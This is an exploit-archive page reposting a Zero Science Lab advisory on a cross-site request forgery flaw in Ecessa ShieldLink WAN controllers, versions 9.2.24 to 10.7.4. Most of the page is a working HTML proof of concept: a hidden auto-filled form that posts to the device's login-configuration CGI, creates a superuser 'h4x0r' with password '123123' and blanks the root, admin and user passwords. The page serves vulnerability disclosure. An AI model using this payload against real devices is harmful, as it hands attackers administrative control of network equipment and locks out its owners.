Ecessa ShieldLink SL175EHQ 10.7.4 CSRF Add Superuser Exploit

2018.06.25

Credit: LiquidWorm

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-352

<!--

Ecessa ShieldLink SL175EHQ 10.7.4 CSRF Add Superuser Exploit


Vendor: Ecessa Corporation
Product web page: https://www.ecessa.com
Affected version: 10.7.4
                  10.6.9
                  10.7.4
                  10.6.5.2
                  10.5.4
                  10.2.24
                  9.2.24

Summary: Ecessa's ShieldLink 60, 175, 600,1200 & 4000 are advanced, yet highly
affordable secure WAN Optimization Controllers that incorporate all of the ISP/WAN
link.

Desc: The application interface allows users to perform certain actions via
HTTP requests without performing any validity checks to verify the requests.
This can be exploited to perform certain actions with administrative privileges
if a logged-in user visits a malicious web site.

Tested on: lighttpd/1.4.35


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2018-5476
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5476.php


21.05.2018

-->


<html>
  <body>
    <form action="https://127.0.0.1/cgi-bin/pl_web.cgi/util_configlogin_act" method="POST">
      <input type="hidden" name="savecrtcfg" value="checked" />
      <input type="hidden" name="user_username1" value="root" />
      <input type="hidden" name="user_enabled1" value="on" />
      <input type="hidden" name="user_passwd1" value="" />
      <input type="hidden" name="user_passwd_verify1" value="" />
      <input type="hidden" name="user_delete1" value="" />
      <input type="hidden" name="user_username2" value="admin" />
      <input type="hidden" name="user_passwd2" value="" />
      <input type="hidden" name="user_passwd_verify2" value="" />
      <input type="hidden" name="user_delete2" value="" />
      <input type="hidden" name="user_username3" value="user" />
      <input type="hidden" name="user_enabled3" value="on" />
      <input type="hidden" name="user_passwd3" value="" />
      <input type="hidden" name="user_passwd_verify3" value="" />
      <input type="hidden" name="user_delete3" value="" />
      <input type="hidden" name="user_username4" value="h4x0r" />
      <input type="hidden" name="user_enabled4" value="on" />
      <input type="hidden" name="user_superuser4" value="on" />
      <input type="hidden" name="user_passwd4" value="123123" />
      <input type="hidden" name="user_passwd_verify4" value="123123" />
      <input type="hidden" name="users_num" value="4" />
      <input type="hidden" name="page" value="util_configlogin" />
      <input type="hidden" name="val_requested_page" value="user_accounts" />
      <input type="hidden" name="savecrtcfg" value="checked" />
      <input type="hidden" name="page_uuid" value="df220e51-db68-492e-a745-d14adfd2f4fb" />
      <input type="hidden" name="form_has_changed" value="1" />
      <input type="submit" value="Supersize!" />
    </form>
  </body>
</html>

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Ecessa ShieldLink SL175EHQ 10.7.4 CSRF Add Superuser Exploit

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.